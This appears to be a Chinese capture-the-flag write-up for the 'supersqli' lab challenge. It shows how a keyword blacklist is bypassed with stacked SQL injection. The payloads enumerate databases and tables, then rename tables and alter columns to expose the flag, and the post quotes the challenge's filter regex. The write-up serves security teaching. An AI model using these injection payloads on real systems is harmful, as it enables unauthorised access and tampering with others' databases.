攻防世界——supersqli

1、打开显示f12是没有灵魂的

2、使用万能的sql注入语句 1' or 1=1#

回显不正常，说明存在注入

3、开始判断有多少列,当开始判断到第三列时，回显不正常，说明只有两列

 4、现在就开始注入了

但是在用联合查询时并没有返回想要的信息，出现了一串

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

上网冲浪了解了一波，好像是类似黑名单，这些词会被替换，那没办法了，我们就用堆叠注入

PHP preg_replace() 正则替换，与Javascript 正则替换不同，PHP preg_replace() 默认就是替换所有符号匹配条件的元素。 
 

复制代码 代码如下:

preg_replace (正则表达式, 替换成, 字符串, 最大替换次数【默认-1，无数次】, 替换次数)

• -1';show databases;#

•   -1';use supersqli;show tables;#
•   -1';use supersqli;show columns from `1919810931114514`;#       

 这里数字要用反引号包裹

•  接下来应该select flag from `1919810931114514`，但是select被过滤了只要网上冲浪看看大佬们怎么做的

 我们查询word列发现结构大致相同，由于注入框的查询是对列id的搜索，此时参考两个表的列名，需要将flag列名改为能够查找的id列（修改包括名称和数据类型）。

接下来输入：1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `flag` `id` varchar(100);#

 

•  在用1' or 1=1#就查出来了

 借鉴一个大神的

 

    第二个方法是将两个表列名互换，查询语句不变的情况下，会直接查询words表中内容。

    RENAME TABLE tbl_name TO new_tbl_name 将表tbl_name的名字改成new_tbl_name。

    由于注入框的查询是对列id的搜索，此时参考两个表的列名，需要将flag列名改为能够查找的id列（修改包括名称和数据类型）。

ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;

    1

    具体为什么修改为CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL就是数据库数据类型的问题了。

    将操作连贯起来，构造Payload。

';RENAME TABLE `words` TO `word`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;SHOW columns FROM words;

    1

    到这里我们的表列名就已经修改完毕，此时还会输出修改完成的words列名，最后通过万能钥匙1' or '1'='1即可得到输出。

array(6) {
  [0]=>
  string(2) "id"
  [1]=>
  string(12) "varchar(100)"
  [2]=>
  string(2) "NO"
  [3]=>
  string(0) ""
  [4]=>
  NULL
  [5]=>
  string(0) ""
}

————————————————
版权声明：本文为CSDN博主「ch3uhx9」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/qq_45969062/article/details/114683113